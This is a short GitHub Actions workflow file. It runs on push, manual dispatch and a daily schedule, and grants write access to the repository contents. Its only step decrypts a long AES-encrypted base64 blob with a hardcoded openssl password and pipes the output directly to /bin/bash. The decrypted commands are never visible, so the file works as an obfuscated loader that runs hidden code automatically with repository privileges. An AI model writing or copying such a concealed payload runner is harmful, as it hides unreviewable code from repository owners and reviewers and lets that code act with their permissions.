name: xxoo
on:
  workflow_dispatch:
  push:
  schedule:
    - cron: '0 20 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      contents: write
    steps:
      - uses: actions/checkout@v4
      - name: xxoo
        run: |
          echo "U2FsdGVkX1/O1ASdmvcTmq4nga/bKHdFL/UBWY3i+m8WoWAn0PiCU3tjBE6zcaC1mabF5bT9U2RySxaUJO7dvApuSzHazFsapQAi41S2NXtfbISzQ/4etWEGvF0RQUrHJAbzukCimCRtXQJQEaPmxSFYL413IJMQL6qMOxLjXZxQwRTDGocnQCddHaoQWlnWoqVo+xH9T59MlCWvhvCnZfFjex/qSGDLyNIU8iiPljLT3cCnHfF7se3rR+J/ahfp5FKYh1oOT8WsMlgtwzEtOfmTN7kBCouA7Ek4idoQhfE3Q5dK8LRi8KfboLrSEXyuWY4HQBdhb2A6VN1PeZu6mzO02ScxvzOD83v0EqPKbUKCbLgqr2lcMkxJ0CwI0X+0FlKGBYvu0U3EOHTkSdwTIJ+OVvYfCj3nya7SWnnguvfmRN5BTq7Wvo8Sb/FUlDblZYGFadgIHmEZxOKZ00XBOPXBSqfvIp9wEkXsHf/OYFQwURGuGbBAvHW6vjaWYZxYso2NdQoYl1TJvA8JYXTlnU0EYdGJ7c4KXavJWNZq+qxlDGq+tsF5+QqyPmRajSEKgb2feB9vGff0EuE7BYacHBQoXnTMCcxCifw4HbbPns2UmXovhKwVWPZfEmIGeXcS2tftttUd0Uk2mbgUIOmrt3LO4icoLM7TR+1NCmDaB/YBZm0jbMWM4UV7MBmOXurjTctzXGjwdlamv7vPTUeN0nVBOGChfvHnwlnw1Q0qUhnTiPl1EU/a1hQxr4UTcwuoX40H8EfCrip4rbJVKRAMnwaeRxwUv2lcbhuFPYtXXZknbFQ9G2aG0a0nS/5hZKTWhDP9HQXOpuom9jK8qFaIiEFSBZcR2hiKLGTqCZ0GEklYS89HIKxROi84AF0cwn9PlYTYI/EgFP5fi0/BOKNYjtCSJwu6Pz0EXej3cdamTxdN5CO6J8gVzKjGWCaC/lwTWCOSSi+ZOOsxJ47P+zrBZ9p3Xb8k4StNynNCiXQsSjd/34tjk7Y14E1i0x8lU97jQg8PggwzNEDPecnFLWsndw0DxYDJklOFCySlNPP2U0z3mEkoRDaCE4NMN6cA0h8dpcTTBKImyA8jv3HsRYnngbzEjIs/Rgal3+450npnVWryYjzsW6t2LT0yBFRkC/U9ek3J1dxJOjj19gYKTFDxrKCWfRUrH+ZZGV3H5KyKc2nUwdY5Cz7nef8yIEXdtiTR8vTYm32CqeZBv9gMcSMlk/o7/IlRb+C0hlO6VGCHzcN5GUwv2ELMz60U/g8JdB41JHNZaPtQi/P5SnpC9IpjmOz10Eu5xhr2IQUWrYg5IkqBWrBUs4FokKGxznxl6a8mb55sXRyQw14ET99QGJS/fEGoIFqJfhBxxtygDJ+qzcvlSSzVbHu2Nga0cK/2Jl1hDdn14OP2k6E+ELU/XzPjzcv/olfn4EmaFjDM8gW6tTqm00mKznFRzGYtMXu3BU71X+hvp8Mf1tYOlaHdi7I1Xg==" | openssl enc -d -aes-256-cbc -base64 -A -salt -pbkdf2 -pass pass:7uhfudnfud909~~23 | /bin/bash
